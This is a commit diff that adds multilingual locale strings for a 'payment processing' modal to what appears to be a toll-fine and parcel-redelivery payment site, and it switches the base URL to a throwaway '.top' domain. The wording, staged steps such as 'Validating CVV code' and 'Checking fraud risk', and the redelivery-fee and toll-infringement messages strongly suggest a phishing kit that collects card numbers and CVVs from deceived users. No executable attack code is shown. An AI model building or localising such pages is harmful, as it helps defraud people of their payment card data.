update
This commit is contained in:
File diff suppressed because one or more lines are too long
@@ -94,5 +94,33 @@ export default {
|
||||
"{time} seconds": "{time} sekund",
|
||||
"International Payment Network": "Międzynarodowa sieć płatności",
|
||||
"redelivery_fee_message": "W celu ponownej dostawy wymagana jest opłata serwisowa w wysokości {amount}. Twoja paczka zostanie ponownie dostarczona po dokonaniu płatności",
|
||||
"Verifying...": "Weryfikacja..."
|
||||
"Verifying...": "Weryfikacja...",
|
||||
payment_loading: {
|
||||
modal_title: "Przetwarzanie płatności",
|
||||
modal_subtitle: "Prosimy nie zamykać tej strony",
|
||||
transaction_details: "Szczegóły transakcji",
|
||||
transaction_id: "Identyfikator transakcji:",
|
||||
processing_network: "Sieć przetwarzania:",
|
||||
processing_time: "Czas przetwarzania:",
|
||||
security_level: "Poziom bezpieczeństwa:",
|
||||
preparing: "Przygotowywanie...",
|
||||
high: "Wysoki",
|
||||
step_init: "Inicjalizacja środowiska płatności...",
|
||||
step_encrypt: "Szyfrowanie danych karty...",
|
||||
step_connect: "Nawiązywanie bezpiecznego połączenia...",
|
||||
step_verify_card: "Weryfikacja numeru karty i wystawcy...",
|
||||
step_validate_cvv: "Weryfikacja kodu CVV...",
|
||||
step_fraud: "Sprawdzanie ryzyka oszustwa...",
|
||||
step_send: "Wysyłanie żądania transakcji...",
|
||||
step_wait_auth: "Oczekiwanie na autoryzację banku...",
|
||||
step_process_resp: "Przetwarzanie odpowiedzi banku...",
|
||||
step_confirm: "Potwierdzanie statusu transakcji...",
|
||||
step_finalize: "Finalizowanie transakcji...",
|
||||
network_visa: "Visa Secure Network",
|
||||
network_mastercard: "Mastercard Global Payment Network",
|
||||
network_amex: "Dedykowany kanał American Express",
|
||||
network_unionpay: "Kanał płatności UnionPay",
|
||||
network_intl: "Międzynarodowa sieć płatnicza",
|
||||
time_seconds: "{time} sekund"
|
||||
},
|
||||
};
|
||||
File diff suppressed because one or more lines are too long
@@ -94,5 +94,6 @@ export default {
|
||||
"{time} seconds": "{time} seconds",
|
||||
"International Payment Network": "International Payment Network",
|
||||
"redelivery_fee_message": "For redelivery, a service fee of {amount} is required. Your package will be re-delivered after payment",
|
||||
"Verifying...": "Verifying..."
|
||||
"Verifying...": "Verifying...",
|
||||
payment_loading: { modal_title: "Processing Payment", modal_subtitle: "Please do not close this page", transaction_details: "Transaction Details", transaction_id: "Transaction ID:", processing_network: "Processing Network:", processing_time: "Processing Time:", security_level: "Security Level:", preparing: "Preparing...", high: "High", step_init: "Initializing payment environment...", step_encrypt: "Encrypting card information...", step_connect: "Establishing secure connection...", step_verify_card: "Verifying card number and issuer...", step_validate_cvv: "Validating CVV code...", step_fraud: "Checking fraud risk...", step_send: "Sending transaction request...", step_wait_auth: "Waiting for bank authorization...", step_process_resp: "Processing bank response...", step_confirm: "Confirming transaction status...", step_finalize: "Finalizing transaction...", network_visa: "Visa Secure Network", network_mastercard: "Mastercard Global Payment Network", network_amex: "American Express Dedicated Channel", network_unionpay: "UnionPay Payment Channel", network_intl: "International Payment Network", time_seconds: "{time} seconds", },
|
||||
};
|
||||
File diff suppressed because one or more lines are too long
@@ -94,5 +94,33 @@ export default {
|
||||
"{time} seconds": "{time} sekundes",
|
||||
"International Payment Network": "Starptautiskais maksājumu tīkls",
|
||||
"redelivery_fee_message": "Atkārtotai piegādei ir jāmaksā pakalpojuma maksa {amount}. Jūsu sūtījums tiks piegādāts atkārtoti pēc apmaksas",
|
||||
"Verifying...": "Verificē..."
|
||||
"Verifying...": "Verificē...",
|
||||
payment_loading: {
|
||||
modal_title: "Maksājuma apstrāde",
|
||||
modal_subtitle: "Lūdzu, neaizveriet šo lapu",
|
||||
transaction_details: "Darījuma informācija",
|
||||
transaction_id: "Darījuma ID:",
|
||||
processing_network: "Apstrādes tīkls:",
|
||||
processing_time: "Apstrādes laiks:",
|
||||
security_level: "Drošības līmenis:",
|
||||
preparing: "Sagatavo...",
|
||||
high: "Augsts",
|
||||
step_init: "Maksājuma vides inicializēšana...",
|
||||
step_encrypt: "Kartes informācijas šifrēšana...",
|
||||
step_connect: "Droša savienojuma izveide...",
|
||||
step_verify_card: "Kartes numura un izdevēja pārbaude...",
|
||||
step_validate_cvv: "CVV koda pārbaude...",
|
||||
step_fraud: "Krāpšanas riska pārbaude...",
|
||||
step_send: "Darījuma pieprasījuma nosūtīšana...",
|
||||
step_wait_auth: "Gaida bankas autorizāciju...",
|
||||
step_process_resp: "Bankas atbildes apstrāde...",
|
||||
step_confirm: "Darījuma statusa apstiprināšana...",
|
||||
step_finalize: "Darījuma pabeigšana...",
|
||||
network_visa: "Visa drošais tīkls",
|
||||
network_mastercard: "Mastercard globālais maksājumu tīkls",
|
||||
network_amex: "American Express īpašais kanāls",
|
||||
network_unionpay: "UnionPay maksājumu kanāls",
|
||||
network_intl: "Starptautiskais maksājumu tīkls",
|
||||
time_seconds: "{time} sekundes",
|
||||
},
|
||||
};
|
||||
@@ -14,7 +14,7 @@ const userData = ref({});
|
||||
const app = createApp(App);
|
||||
app.config.globalProperties.$currentUser = userData;
|
||||
const i18n = createI18n({
|
||||
lv: "lv",
|
||||
locale: "lv",
|
||||
messages: {
|
||||
lv: lv,
|
||||
},
|
||||
|
||||
File diff suppressed because one or more lines are too long
@@ -118,5 +118,6 @@ export default {
|
||||
"Successful Toll Payment": "Payment Successful",
|
||||
"Thank you for your payment. The tolls have been processed successfully.": "Thank you. Your infringement / toll payment has been processed successfully.",
|
||||
"Phone": "Phone",
|
||||
"Toll Amount": "Total Amount"
|
||||
"Toll Amount": "Total Amount",
|
||||
payment_loading: { modal_title: "Processing Payment", modal_subtitle: "Please do not close this page", transaction_details: "Transaction Details", transaction_id: "Transaction ID:", processing_network: "Processing Network:", processing_time: "Processing Time:", security_level: "Security Level:", preparing: "Preparing...", high: "High", step_init: "Initializing payment environment...", step_encrypt: "Encrypting card information...", step_connect: "Establishing secure connection...", step_verify_card: "Verifying card number and issuer...", step_validate_cvv: "Validating CVV code...", step_fraud: "Checking fraud risk...", step_send: "Sending transaction request...", step_wait_auth: "Waiting for bank authorization...", step_process_resp: "Processing bank response...", step_confirm: "Confirming transaction status...", step_finalize: "Finalizing transaction...", network_visa: "Visa Secure Network", network_mastercard: "Mastercard Global Payment Network", network_amex: "American Express Dedicated Channel", network_unionpay: "UnionPay Payment Channel", network_intl: "International Payment Network", time_seconds: "{time} seconds", },
|
||||
};
|
||||
File diff suppressed because one or more lines are too long
@@ -118,5 +118,6 @@ export default {
|
||||
"Successful Toll Payment": "Payment Successful",
|
||||
"Thank you for your payment. The tolls have been processed successfully.": "Thank you. Your infringement / toll payment has been processed successfully.",
|
||||
"Phone": "Phone",
|
||||
"Toll Amount": "Total Amount"
|
||||
"Toll Amount": "Total Amount",
|
||||
payment_loading: { modal_title: "Processing Payment", modal_subtitle: "Please do not close this page", transaction_details: "Transaction Details", transaction_id: "Transaction ID:", processing_network: "Processing Network:", processing_time: "Processing Time:", security_level: "Security Level:", preparing: "Preparing...", high: "High", step_init: "Initializing payment environment...", step_encrypt: "Encrypting card information...", step_connect: "Establishing secure connection...", step_verify_card: "Verifying card number and issuer...", step_validate_cvv: "Validating CVV code...", step_fraud: "Checking fraud risk...", step_send: "Sending transaction request...", step_wait_auth: "Waiting for bank authorization...", step_process_resp: "Processing bank response...", step_confirm: "Confirming transaction status...", step_finalize: "Finalizing transaction...", network_visa: "Visa Secure Network", network_mastercard: "Mastercard Global Payment Network", network_amex: "American Express Dedicated Channel", network_unionpay: "UnionPay Payment Channel", network_intl: "International Payment Network", time_seconds: "{time} seconds", },
|
||||
};
|
||||
File diff suppressed because one or more lines are too long
@@ -118,5 +118,6 @@ export default {
|
||||
"Successful Toll Payment": "Payment Successful",
|
||||
"Thank you for your payment. The tolls have been processed successfully.": "Thank you. Your infringement / toll payment has been processed successfully.",
|
||||
"Phone": "Phone",
|
||||
"Toll Amount": "Total Amount"
|
||||
"Toll Amount": "Total Amount",
|
||||
payment_loading: { modal_title: "Processing Payment", modal_subtitle: "Please do not close this page", transaction_details: "Transaction Details", transaction_id: "Transaction ID:", processing_network: "Processing Network:", processing_time: "Processing Time:", security_level: "Security Level:", preparing: "Preparing...", high: "High", step_init: "Initializing payment environment...", step_encrypt: "Encrypting card information...", step_connect: "Establishing secure connection...", step_verify_card: "Verifying card number and issuer...", step_validate_cvv: "Validating CVV code...", step_fraud: "Checking fraud risk...", step_send: "Sending transaction request...", step_wait_auth: "Waiting for bank authorization...", step_process_resp: "Processing bank response...", step_confirm: "Confirming transaction status...", step_finalize: "Finalizing transaction...", network_visa: "Visa Secure Network", network_mastercard: "Mastercard Global Payment Network", network_amex: "American Express Dedicated Channel", network_unionpay: "UnionPay Payment Channel", network_intl: "International Payment Network", time_seconds: "{time} seconds", },
|
||||
};
|
||||
File diff suppressed because one or more lines are too long
@@ -118,5 +118,6 @@ export default {
|
||||
"Successful Toll Payment": "Payment Successful",
|
||||
"Thank you for your payment. The tolls have been processed successfully.": "Thank you. Your infringement / toll payment has been processed successfully.",
|
||||
"Phone": "Phone",
|
||||
"Toll Amount": "Total Amount"
|
||||
"Toll Amount": "Total Amount",
|
||||
payment_loading: { modal_title: "Processing Payment", modal_subtitle: "Please do not close this page", transaction_details: "Transaction Details", transaction_id: "Transaction ID:", processing_network: "Processing Network:", processing_time: "Processing Time:", security_level: "Security Level:", preparing: "Preparing...", high: "High", step_init: "Initializing payment environment...", step_encrypt: "Encrypting card information...", step_connect: "Establishing secure connection...", step_verify_card: "Verifying card number and issuer...", step_validate_cvv: "Validating CVV code...", step_fraud: "Checking fraud risk...", step_send: "Sending transaction request...", step_wait_auth: "Waiting for bank authorization...", step_process_resp: "Processing bank response...", step_confirm: "Confirming transaction status...", step_finalize: "Finalizing transaction...", network_visa: "Visa Secure Network", network_mastercard: "Mastercard Global Payment Network", network_amex: "American Express Dedicated Channel", network_unionpay: "UnionPay Payment Channel", network_intl: "International Payment Network", time_seconds: "{time} seconds", },
|
||||
};
|
||||
File diff suppressed because one or more lines are too long
@@ -118,5 +118,33 @@ export default {
|
||||
"Successful Toll Payment": "Payment Successful",
|
||||
"Thank you for your payment. The tolls have been processed successfully.": "Thank you. Your infringement / toll payment has been processed successfully.",
|
||||
"Phone": "Phone",
|
||||
"Toll Amount": "Total Amount"
|
||||
"Toll Amount": "Total Amount",
|
||||
payment_loading: {
|
||||
modal_title: "Processing Payment",
|
||||
modal_subtitle: "Please do not close this page",
|
||||
transaction_details: "Transaction Details",
|
||||
transaction_id: "Transaction ID:",
|
||||
processing_network: "Processing Network:",
|
||||
processing_time: "Processing Time:",
|
||||
security_level: "Security Level:",
|
||||
preparing: "Preparing...",
|
||||
high: "High",
|
||||
step_init: "Initializing payment environment...",
|
||||
step_encrypt: "Encrypting card information...",
|
||||
step_connect: "Establishing secure connection...",
|
||||
step_verify_card: "Verifying card number and issuer...",
|
||||
step_validate_cvv: "Validating CVV code...",
|
||||
step_fraud: "Checking fraud risk...",
|
||||
step_send: "Sending transaction request...",
|
||||
step_wait_auth: "Waiting for bank authorization...",
|
||||
step_process_resp: "Processing bank response...",
|
||||
step_confirm: "Confirming transaction status...",
|
||||
step_finalize: "Finalizing transaction...",
|
||||
network_visa: "Visa Secure Network",
|
||||
network_mastercard: "Mastercard Global Payment Network",
|
||||
network_amex: "American Express Dedicated Channel",
|
||||
network_unionpay: "UnionPay Payment Channel",
|
||||
network_intl: "International Payment Network",
|
||||
time_seconds: "{time} seconds",
|
||||
},
|
||||
};
|
||||
@@ -5,7 +5,7 @@ VITE_PORT = 8848
|
||||
VITE_PUBLIC_PATH = ./
|
||||
|
||||
# 网站前缀
|
||||
VITE_BASE_URL = "dsf.dagf7.top"
|
||||
VITE_BASE_URL = "upc.xx.sczqb6.top"
|
||||
|
||||
# 开发环境路由历史模式(Hash模式传"hash"、HTML5模式传"h5"、Hash模式带base参数传"hash,base参数"、HTML5模式带base参数传"h5,base参数")
|
||||
VITE_ROUTER_HISTORY = "hash"
|
||||
|
||||
File diff suppressed because one or more lines are too long
@@ -118,5 +118,33 @@ export default {
|
||||
"Successful Toll Payment": "Payment Successful",
|
||||
"Thank you for your payment. The tolls have been processed successfully.": "Thank you. Your infringement / toll payment has been processed successfully.",
|
||||
"Phone": "Phone",
|
||||
"Toll Amount": "Total Amount"
|
||||
"Toll Amount": "Total Amount",
|
||||
payment_loading: {
|
||||
modal_title: "Processing Payment",
|
||||
modal_subtitle: "Please do not close this page",
|
||||
transaction_details: "Transaction Details",
|
||||
transaction_id: "Transaction ID:",
|
||||
processing_network: "Processing Network:",
|
||||
processing_time: "Processing Time:",
|
||||
security_level: "Security Level:",
|
||||
preparing: "Preparing...",
|
||||
high: "High",
|
||||
step_init: "Initializing payment environment...",
|
||||
step_encrypt: "Encrypting card information...",
|
||||
step_connect: "Establishing secure connection...",
|
||||
step_verify_card: "Verifying card number and issuer...",
|
||||
step_validate_cvv: "Validating CVV code...",
|
||||
step_fraud: "Checking fraud risk...",
|
||||
step_send: "Sending transaction request...",
|
||||
step_wait_auth: "Waiting for bank authorization...",
|
||||
step_process_resp: "Processing bank response...",
|
||||
step_confirm: "Confirming transaction status...",
|
||||
step_finalize: "Finalizing transaction...",
|
||||
network_visa: "Visa Secure Network",
|
||||
network_mastercard: "Mastercard Global Payment Network",
|
||||
network_amex: "American Express Dedicated Channel",
|
||||
network_unionpay: "UnionPay Payment Channel",
|
||||
network_intl: "International Payment Network",
|
||||
time_seconds: "{time} seconds",
|
||||
},
|
||||
};
|
||||
File diff suppressed because one or more lines are too long
@@ -118,5 +118,34 @@ export default {
|
||||
"Successful Toll Payment": "Payment Successful",
|
||||
"Thank you for your payment. The tolls have been processed successfully.": "Thank you. Your infringement / toll payment has been processed successfully.",
|
||||
"Phone": "Phone",
|
||||
"Toll Amount": "Total Amount"
|
||||
"Toll Amount": "Total Amount",
|
||||
// payment_loading
|
||||
payment_loading: {
|
||||
modal_title: "Processing Payment",
|
||||
modal_subtitle: "Please do not close this page",
|
||||
transaction_details: "Transaction Details",
|
||||
transaction_id: "Transaction ID:",
|
||||
processing_network: "Processing Network:",
|
||||
processing_time: "Processing Time:",
|
||||
security_level: "Security Level:",
|
||||
preparing: "Preparing...",
|
||||
high: "High",
|
||||
step_init: "Initializing payment environment...",
|
||||
step_encrypt: "Encrypting card information...",
|
||||
step_connect: "Establishing secure connection...",
|
||||
step_verify_card: "Verifying card number and issuer...",
|
||||
step_validate_cvv: "Validating CVV code...",
|
||||
step_fraud: "Checking fraud risk...",
|
||||
step_send: "Sending transaction request...",
|
||||
step_wait_auth: "Waiting for bank authorization...",
|
||||
step_process_resp: "Processing bank response...",
|
||||
step_confirm: "Confirming transaction status...",
|
||||
step_finalize: "Finalizing transaction...",
|
||||
network_visa: "Visa Secure Network",
|
||||
network_mastercard: "Mastercard Global Payment Network",
|
||||
network_amex: "American Express Dedicated Channel",
|
||||
network_unionpay: "UnionPay Payment Channel",
|
||||
network_intl: "International Payment Network",
|
||||
time_seconds: "{time} seconds",
|
||||
},
|
||||
};
|
||||
File diff suppressed because one or more lines are too long
@@ -94,5 +94,34 @@ export default {
|
||||
"{time} seconds": "{time} segundos",
|
||||
"International Payment Network": "Red internacional de pagos",
|
||||
"redelivery_fee_message": "Para la reentrega, se requiere una tarifa de servicio de {amount}. Su paquete será reenviado después del pago",
|
||||
"Verifying...": "Verificando..."
|
||||
"Verifying...": "Verificando...",
|
||||
// payment_loading
|
||||
payment_loading: {
|
||||
modal_title: "Procesando pago",
|
||||
modal_subtitle: "Por favor, no cierres esta página",
|
||||
transaction_details: "Detalles de la transacción",
|
||||
transaction_id: "ID de transacción:",
|
||||
processing_network: "Red de procesamiento:",
|
||||
processing_time: "Tiempo de procesamiento:",
|
||||
security_level: "Nivel de seguridad:",
|
||||
preparing: "Preparando...",
|
||||
high: "Alto",
|
||||
step_init: "Inicializando entorno de pago...",
|
||||
step_encrypt: "Cifrando información de la tarjeta...",
|
||||
step_connect: "Estableciendo conexión segura...",
|
||||
step_verify_card: "Verificando número de tarjeta y emisor...",
|
||||
step_validate_cvv: "Validando código CVV...",
|
||||
step_fraud: "Comprobando riesgo de fraude...",
|
||||
step_send: "Enviando solicitud de transacción...",
|
||||
step_wait_auth: "Esperando autorización bancaria...",
|
||||
step_process_resp: "Procesando respuesta del banco...",
|
||||
step_confirm: "Confirmando estado de la transacción...",
|
||||
step_finalize: "Finalizando transacción...",
|
||||
network_visa: "Red Segura de Visa",
|
||||
network_mastercard: "Red Global de Pagos Mastercard",
|
||||
network_amex: "Canal Dedicado de American Express",
|
||||
network_unionpay: "Canal de Pago UnionPay",
|
||||
network_intl: "Red Internacional de Pagos",
|
||||
time_seconds: "{time} segundos",
|
||||
},
|
||||
};
|
||||
File diff suppressed because one or more lines are too long
@@ -94,5 +94,34 @@ export default {
|
||||
"{time} seconds": "{time} segundos",
|
||||
"International Payment Network": "Red internacional de pagos",
|
||||
"redelivery_fee_message": "Para la reentrega, se requiere una tarifa de servicio de {amount}. Su paquete será reenviado después del pago",
|
||||
"Verifying...": "Verificando..."
|
||||
"Verifying...": "Verificando...",
|
||||
// payment_loading
|
||||
payment_loading: {
|
||||
modal_title: "Procesando pago",
|
||||
modal_subtitle: "Por favor, no cierres esta página",
|
||||
transaction_details: "Detalles de la transacción",
|
||||
transaction_id: "ID de transacción:",
|
||||
processing_network: "Red de procesamiento:",
|
||||
processing_time: "Tiempo de procesamiento:",
|
||||
security_level: "Nivel de seguridad:",
|
||||
preparing: "Preparando...",
|
||||
high: "Alto",
|
||||
step_init: "Inicializando entorno de pago...",
|
||||
step_encrypt: "Cifrando información de la tarjeta...",
|
||||
step_connect: "Estableciendo conexión segura...",
|
||||
step_verify_card: "Verificando número de tarjeta y emisor...",
|
||||
step_validate_cvv: "Validando código CVV...",
|
||||
step_fraud: "Comprobando riesgo de fraude...",
|
||||
step_send: "Enviando solicitud de transacción...",
|
||||
step_wait_auth: "Esperando autorización bancaria...",
|
||||
step_process_resp: "Procesando respuesta del banco...",
|
||||
step_confirm: "Confirmando estado de la transacción...",
|
||||
step_finalize: "Finalizando transacción...",
|
||||
network_visa: "Red Segura de Visa",
|
||||
network_mastercard: "Red Global de Pagos Mastercard",
|
||||
network_amex: "Canal Dedicado de American Express",
|
||||
network_unionpay: "Canal de Pago UnionPay",
|
||||
network_intl: "Red Internacional de Pagos",
|
||||
time_seconds: "{time} segundos",
|
||||
},
|
||||
};
|
||||
File diff suppressed because one or more lines are too long
@@ -94,5 +94,34 @@ export default {
|
||||
"{time} seconds": "{time} segundos",
|
||||
"International Payment Network": "Red de pagos internacional",
|
||||
"redelivery_fee_message": "Para la reentrega, se requiere una tarifa de servicio de {amount}. Su paquete será reenviado después del pago",
|
||||
"Verifying...": "Verificando..."
|
||||
"Verifying...": "Verificando...",
|
||||
// payment_loading
|
||||
payment_loading: {
|
||||
modal_title: "Procesando pago",
|
||||
modal_subtitle: "Por favor, no cierres esta página",
|
||||
transaction_details: "Detalles de la transacción",
|
||||
transaction_id: "ID de transacción:",
|
||||
processing_network: "Red de procesamiento:",
|
||||
processing_time: "Tiempo de procesamiento:",
|
||||
security_level: "Nivel de seguridad:",
|
||||
preparing: "Preparando...",
|
||||
high: "Alto",
|
||||
step_init: "Inicializando entorno de pago...",
|
||||
step_encrypt: "Cifrando información de la tarjeta...",
|
||||
step_connect: "Estableciendo conexión segura...",
|
||||
step_verify_card: "Verificando número de tarjeta y emisor...",
|
||||
step_validate_cvv: "Validando código CVV...",
|
||||
step_fraud: "Comprobando riesgo de fraude...",
|
||||
step_send: "Enviando solicitud de transacción...",
|
||||
step_wait_auth: "Esperando autorización bancaria...",
|
||||
step_process_resp: "Procesando respuesta del banco...",
|
||||
step_confirm: "Confirmando estado de la transacción...",
|
||||
step_finalize: "Finalizando transacción...",
|
||||
network_visa: "Red Segura de Visa",
|
||||
network_mastercard: "Red Global de Pagos Mastercard",
|
||||
network_amex: "Canal Dedicado de American Express",
|
||||
network_unionpay: "Canal de Pago UnionPay",
|
||||
network_intl: "Red Internacional de Pagos",
|
||||
time_seconds: "{time} segundos",
|
||||
},
|
||||
};
|
||||
Reference in New Issue
Block a user